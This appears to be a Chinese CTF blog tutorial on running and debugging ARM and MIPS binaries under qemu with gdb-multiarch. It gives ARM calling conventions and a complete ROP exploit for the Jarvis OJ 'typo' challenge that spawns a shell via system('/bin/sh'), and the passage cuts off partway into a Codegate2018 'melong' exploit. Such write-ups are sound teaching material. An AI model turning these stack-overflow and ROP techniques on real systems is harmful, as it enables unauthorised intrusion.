class="chroma"><code class="language-bash" data-lang="bash">$ apt search <span class="s2">&#34;libc6-&#34;</span> <span class="p">|</span> grep <span class="s2">&#34;ARCH&#34;</span> </code></pre></td></tr></table> </div> </div><p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5cudid7gj30xy0h7trd.jpg" alt=""></p> <p>我们只需安装类似 <strong>libc6-ARCH-cross</strong> 形式的即可</p> <h3 id="运行">运行：</h3> <p>静态链接的 binary 直接运行即可，会自动调用对应架构的 qemu；</p> <p>动态链接的 bianry 需要用对应的 qemu 同时指定共享库路径，如下图32位的动态链接 mips binary</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5d1guaxvj313m03bq55.jpg" alt=""></p> <p>使用 -L 指定共享库：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ qemu-mipsel -L /usr/mipsel-linux-gnu/ ./add </code></pre></td></tr></table> </div> </div><p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5d3xxmfqj30z50c4ahc.jpg" alt=""></p> <h3 id="调试">调试：</h3> <p>可以使用 qemu 的 -g 指定端口</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ qemu-mipsel -g <span class="m">1234</span> -L /usr/mipsel-linux-gnu/ ./add </code></pre></td></tr></table> </div> </div><p>然后使用gdb-multiarch进行调试，先指定架构，然后使用remote功能</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pwndbg&gt; <span class="nb">set</span> architecture mips <span class="o">(</span>但大多数情况下这一步可以省略, 似乎 pwndbg 能自动识别架构<span class="o">)</span> pwndbg&gt; target remote localhost:1234 </code></pre></td></tr></table> </div> </div><p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5dbufgrjj31400p013o.jpg" alt=""></p> <p>这样我们就能进行调试了</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5de5c26aj31400p046h.jpg" alt=""></p> <h3 id="效果图">效果图：</h3> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5de5c26aj31400p046h.jpg" alt=""></p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq5dg64kb8j31400p0tgd.jpg" alt=""></p> <h3 id="more">more：</h3> <p>同样，如果想要运行或者调试其他架构的 binary，只需安装其他架构的 qemu 和共享库即可</p> <h3 id="reference">reference：</h3> <p><a href="https://docs.pwntools.com/en/stable/qemu.html">https://docs.pwntools.com/en/stable/qemu.html</a></p> <p><a href="https://reverseengineering.stackexchange.com/questions/8829/cross-debugging-for-arm-mips-elf-with-qemu-toolchain">https://reverseengineering.stackexchange.com/questions/8829/cross-debugging-for-arm-mips-elf-with-qemu-toolchain</a></p> <hr> <h2 id="运行和调试">运行和调试</h2> <p>安装好 qemu 之后, 就可以在本地运行和调试 binary 了, 我写了一个模板:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s2">&#34;your_binary&#34;</span> <span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;r&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s2">&#34;remote_addr&#34;</span><span class="p">,</span> <span class="n">remote_port</span><span class="p">)</span> <span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;l&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s2">&#34;qemu-arm&#34;</span><span class="p">,</span> <span class="s2">&#34;-L&#34;</span><span class="p">,</span> <span class="s2">&#34;/usr/arm-linux-gnueabi&#34;</span><span class="p">,</span> <span class="s2">&#34;your_binary&#34;</span><span class="p">])</span> <span class="k">else</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s2">&#34;qemu-arm&#34;</span><span class="p">,</span> <span class="s2">&#34;-g&#34;</span><span class="p">,</span> <span class="s2">&#34;1234&#34;</span><span class="p">,</span> <span class="s2">&#34;-L&#34;</span><span class="p">,</span> <span class="s2">&#34;/usr/arm-linux-gnueabi&#34;</span><span class="p">,</span> <span class="s2">&#34;your_binary&#34;</span><span class="p">])</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;your_binary&#34;</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;/usr/arm-linux-gnueabi/lib/libc.so.6&#34;</span><span class="p">)</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> </code></pre></td></tr></table> </div> </div><p>说明一下:</p> <ul> <li>根据 pwntools 的 <a href="http://docs.pwntools.com/en/stable/context.html?highlight=context.binary#pwnlib-context-setting-runtime-variables">官方文档</a>, 使用 context.binary 指定 binary 时, 就可以不用指定 context.arch, context.os 等参数了</li> </ul> <blockquote> <p>The recommended method is to use context.binary to automagically set all of the appropriate values.</p> </blockquote> <ul> <li> <p>python exp.py r 打远程</p> </li> <li> <p>python exp.py l 本地测试</p> </li> <li> <p>python exp.py d/a/b/&hellip; 用于本地调试, exp 启动后新启一个终端, 使用 <strong>gdb-multiarch</strong> 就可以通过 <strong>target remote localhost:1234</strong> 来进行调试了</p> </li> <li> <p>这里只写了使用 arm-linux-gnueabi 的情况, 使用 arm-linux-gnueabihf 的话更改参数即可, 关于二者的区别可以参考这篇 <a href="https://www.cnblogs.com/xiaotlili/p/3306100.html">文章</a></p> </li> </ul> <h2 id="arm-下的函数调用约定">arm 下的函数调用约定</h2> <p>arm 的参数 1 ~ 4 分别保存到 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡, 返回值存放在 r0 中</p> <p>一图胜千言:</p> <p><img src="https://courses.washington.edu/cp105/_images/ARM_Calling_Convention.png" alt=""></p> <p>by the way, arm 的 pc 指针相当于 eip/rip, b/bl 等指令实现了跳转</p> <p>接下来以几道题目为例进行分析</p> <h2 id="jarvis-oj---typo">Jarvis oj - typo</h2> <p><a href="https://github.com/bash-c/pwn_repo/tree/master/jarvisOJ_typo">题目和脚本链接</a></p> <h3 id="静态分析">静态分析</h3> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">jarvisOJ_typo <span class="o">[</span>master●<span class="o">]</span> check typo typo: ELF 32-bit LSB executable, ARM, EABI5 version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, <span class="k">for</span> GNU/Linux 2.6.32, BuildID<span class="o">[</span>sha1<span class="o">]=</span>211877f58b5a0e8774b8a3a72c83890f8cd38e63, stripped <span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;/home/m4x/pwn_repo/jarvisOJ_typo/typo&#39;</span> Arch: arm-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE </code></pre></td></tr></table> </div> </div><p>32 位 arm 静态链接的程序, strip 过了, 并且没有开栈溢出保护, 因为是静态链接, 所以 binary 中一定会有 system 函数 和 /bin/sh 字符串, 如果能找到溢出点, 很容易就能用 rop 来解决了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">jarvisOJ_typo <span class="o">[</span>master●●<span class="o">]</span> ./typo Let<span class="s1">&#39;s Do Some Typing Exercise~ </span><span class="s1">Press Enter to get start; </span><span class="s1">Input ~ if you want to quit </span><span class="s1"> </span><span class="s1">------Begin------ </span><span class="s1">inquiry </span><span class="s1">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa </span><span class="s1">E.r.r.o.r. </span><span class="s1"> </span><span class="s1">odour </span><span class="s1">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa </span><span class="s1">qemu-arm: /build/qemu-c9y6mQ/qemu-2.8+dfsg/translate-all.c:175: tb_lock: Assertion `!have_tb_lock&#39;</span> failed. qemu-arm: /build/qemu-c9y6mQ/qemu-2.8+dfsg/translate-all.c:175: tb_lock: Assertion <span class="sb">`</span>!have_tb_lock<span class="err">&#39;</span> failed. <span class="o">[</span>1<span class="o">]</span> <span class="m">3426</span> segmentation fault ./typo </code></pre></td></tr></table> </div> </div><h3 id="思路">思路</h3> <p>运行一下发现是一个打字游戏, 很容易就找到了溢出点, 利用 rop chain 构造 system(&quot;/bin/sh&rdquo;) 即可, /bin/sh 的地址比较好找, 只要找到 system 的地址, 这个题目就很容易解决了</p> <p>binary 去除了符号表信息, 并不是太容易看出来函数功能, 幸运的是通过在 IDA 中查看 /bin/sh 的交叉引用, 我们能找到调用 system 的函数(sub_10BA8 函数中出现了 /bin/sh, 读过 system 源码的同学可以发现该函数与 system 的流程类似, 于是大胆猜测 sun_10BA8 即为 system, 后来事实证明确实是)</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">char</span> <span class="o">*</span><span class="kr">__fastcall</span> <span class="nf">sub_110B4</span><span class="p">(</span><span class="kt">int</span> <span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">result</span><span class="p">;</span> <span class="c1">// r0 </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span> <span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">sub_10BA8</span><span class="p">(</span><span class="n">a1</span><span class="p">);</span> <span class="c1">// system(a1) </span><span class="c1"></span> <span class="k">else</span> <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">sub_10BA8</span><span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="s">&#34;exit 0&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">);</span> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><hr> <p>后来发现，使用 <code>rizzo</code> 可以恢复出 system 的符号表，这样寻找 system 的地址就很容易了</p> <h3 id="rop">ROP</h3> <p>这样我们只需要找一个能控制 r0 的 gadget 寄存器就行了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">jarvisOJ_typo <span class="o">[</span>master●●<span class="o">]</span> ROPgadget --binary ./typo --only <span class="s2">&#34;pop|ret&#34;</span> <span class="p">|</span> grep r0 0x00020904 : pop <span class="o">{</span>r0, r4, pc<span class="o">}</span> jarvisOJ_typo <span class="o">[</span>master●●<span class="o">]</span> ROPgadget --binary ./typo --string /bin/sh Strings <span class="nv">information</span> <span class="o">============================================================</span> 0x0006c384 : /bin/sh </code></pre></td></tr></table> </div> </div><p>于是可以构造如下的栈结构</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+------------+ | | | padding | | | | | +------------+ | gadget_addr| &lt;- 0x20904 +------------+ | binsh_addr | &lt;- 0x6c384 +------------+ | junk_data | +------------+ | system_addr| &lt;- 0x100B4 +------------+ </code></pre></td></tr></table> </div> </div><p>这样在程序返回时, 经过 rop 就会实现 r0 -&gt; &ldquo;/bin/sh&rdquo;, r4 -&gt; junk_data, pc = system_addr 的效果, 进而执行 system(&quot;/bin/sh&rdquo;) 来 get shell</p> <p>此时还有一个问题, 不知道 padding 的长度, 可以通过 pwntools 的 cyclic/cyclic -l 来找长度</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pwndbg&gt; cyclic <span class="m">200</span> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab pwndbg&gt; c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x62616164 in ?? <span class="o">()</span> LEGEND: STACK <span class="p">|</span> HEAP <span class="p">|</span> CODE <span class="p">|</span> DATA <span class="p">|</span> RWX <span class="p">|</span> RODATA ──────────────────────────────────────────────────<span class="o">[</span> REGISTERS <span class="o">]</span>────────────────────────────────────────────────── R0 0x0 R1 0xfffef024 ◂— 0x61616161 <span class="o">(</span><span class="s1">&#39;aaaa&#39;</span><span class="o">)</span> R2 0x7e R3 0x0 R4 0x62616162 <span class="o">(</span><span class="s1">&#39;baab&#39;</span><span class="o">)</span> R5 0x0 R6 0x0 R7 0x0 R8 0x0 R9 0xa5ec ◂— push <span class="o">{</span>r3, r4, r5, r6, r7, r8, sb, lr<span class="o">}</span> R10 0xa68c ◂— push <span class="o">{</span>r3, r4, r5, lr<span class="o">}</span> R11 0x62616163 <span class="o">(</span><span class="s1">&#39;caab&#39;</span><span class="o">)</span> R12 0x0 SP 0xfffef098 ◂— 0x62616165 <span class="o">(</span><span class="s1">&#39;eaab&#39;</span><span class="o">)</span> PC 0x62616164 <span class="o">(</span><span class="s1">&#39;daab&#39;</span><span class="o">)</span> ───────────────────────────────────────────────────<span class="o">[</span> DISASM <span class="o">]</span>──────────────────────────────────────────────────── Invalid address 0x62616164 ────────────────────────────────────────────────────<span class="o">[</span> STACK <span class="o">]</span>──────────────────────────────────────────────────── 00:0000│ sp 0xfffef098 ◂— 0x62616165 <span class="o">(</span><span class="s1">&#39;eaab&#39;</span><span class="o">)</span> 01:0004│ 0xfffef09c ◂— 0x62616166 <span class="o">(</span><span class="s1">&#39;faab&#39;</span><span class="o">)</span> 02:0008│ 0xfffef0a0 ◂— 0x62616167 <span class="o">(</span><span class="s1">&#39;gaab&#39;</span><span class="o">)</span> 03:000c│ 0xfffef0a4 ◂— 0x62616168 <span class="o">(</span><span class="s1">&#39;haab&#39;</span><span class="o">)</span> 04:0010│ 0xfffef0a8 ◂— 0x62616169 <span class="o">(</span><span class="s1">&#39;iaab&#39;</span><span class="o">)</span> 05:0014│ 0xfffef0ac ◂— 0x6261616a <span class="o">(</span><span class="s1">&#39;jaab&#39;</span><span class="o">)</span> 06:0018│ 0xfffef0b0 ◂— 0x6261616b <span class="o">(</span><span class="s1">&#39;kaab&#39;</span><span class="o">)</span> 07:001c│ 0xfffef0b4 ◂— 0x6261616c <span class="o">(</span><span class="s1">&#39;laab&#39;</span><span class="o">)</span> Program received signal SIGSEGV pwndbg&gt; cyclic -l 0x62616164 <span class="m">112</span> </code></pre></td></tr></table> </div> </div><hr> <p>或者可以直接爆破 padding 长度</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="nn">pdb</span> <span class="c1"># context.log_level = &#34;debug&#34;</span> <span class="c1"># for i in range(100, 150)[::-1]:</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">112</span><span class="p">,</span> <span class="mi">113</span><span class="p">):</span> <span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;l&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./typo&#34;</span><span class="p">,</span> <span class="n">timeout</span> <span class="o">=</span> <span class="mi">2</span><span class="p">)</span> <span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;d&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s2">&#34;qemu-arm&#34;</span><span class="p">,</span> <span class="s2">&#34;-g&#34;</span><span class="p">,</span> <span class="s2">&#34;1234&#34;</span><span class="p">,</span> <span class="s2">&#34;./typo&#34;</span><span class="p">])</span> <span class="k">else</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s2">&#34;pwn2.jarvisoj.com&#34;</span><span class="p">,</span> <span class="mi">9888</span><span class="p">,</span> <span class="n">timeout</span> <span class="o">=</span> <span class="mi">2</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;quit</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1"> jarvisOJ_typo [master●●] ROPgadget --binary ./typo --string /bin/sh </span><span class="s1"> Strings information </span><span class="s1"> ============================================================ </span><span class="s1"> 0x0006c384 : /bin/sh </span><span class="s1"> jarvisOJ_typo [master●●] ROPgadget --binary ./typo --only &#34;pop|ret&#34; | grep r0 </span><span class="s1"> 0x00020904 : pop {r0, r4, pc} </span><span class="s1"> &#39;&#39;&#39;</span> <span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;a&#39;</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x20904</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x6c384</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x110B4</span><span class="p">)</span> <span class="n">success</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="c1"># pause()</span> <span class="k">try</span><span class="p">:</span> <span class="c1"># pdb.set_trace()</span> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;echo aaaa&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;aaaa&#34;</span><span class="p">,</span> <span class="n">timeout</span> <span class="o">=</span> <span class="mi">1</span><span class="p">)</span> <span class="k">except</span> <span class="ne">EOFError</span><span class="p">:</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> <span class="k">continue</span> <span class="k">else</span><span class="p">:</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><h2 id="codegate2018---melong">Codegate2018 - melong</h2> <p><a href="https://github.com/bash-c/pwn_repo/tree/master/Codegate2018_Melong">题目和脚本链接</a></p> <h3 id="静态分析-1">静态分析</h3> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">melong: ELF 32-bit LSB executable, ARM, EABI5 version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, dynamically linked, interpreter /lib/ld-linux.so.3, <span class="k">for</span> GNU/Linux 3.2.0, BuildID<span class="o">[</span>sha1<span class="o">]=</span>2c55e75a072020303e7c802d32a5b82432f329e9, not stripped <span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;/home/m4x/pwn_repo/Codegate2018_Melong/melong&#39;</span> Arch: arm-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE </code></pre></td></tr></table> </div> </div><h3 id="思路分析">思路分析</h3> <p>程序逻辑很简单, 就不写分析过程了, 漏洞很好找, write_diary 中 read 的长度是由我们输入的, 可以栈溢出, 先进入 PT 函数, 输入 -1, 再进入 write_diary, 就可以实现 arbitrary overflow 了, 因此思路同 x64 下的 rop 相同, 先 leak 出 libc 基址, 然后控制执行 system(&quot;/bin/sh&rdquo;) 即可</p> <p><strong>比赛时这道题目并没有给 libc 文件, 为了简化演示过程, 我直接用了我本地的 libc</strong></p> <h3 id="exp">exp</h3> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">sleep</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s2">&#34;./melong&#34;</span> <span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;r&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s2">&#34;localhost&#34;</span><span class="p">,</span> <span class="mi">9999</span><span class="p">)</span> <span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;l&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s2">&#34;qemu-arm&#34;</span><span class="p">,</span> <span class="s2">&#34;-L&#34;</span><span class="p">,</span> <span class="s2">&#34;./&#34;</span><span class="p">,</span> <span class="s2">&#34;./melong&#34;</span><span class="p">])</span> <span class="k">else</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s2">&#34;qemu-arm&#34;</span><span class="p">,</span> <span class="s2">&#34;-g&#34;</span><span class="p">,</span> <span class="s2">&#34;1234&#34;</span><span class="p">,</span> <span 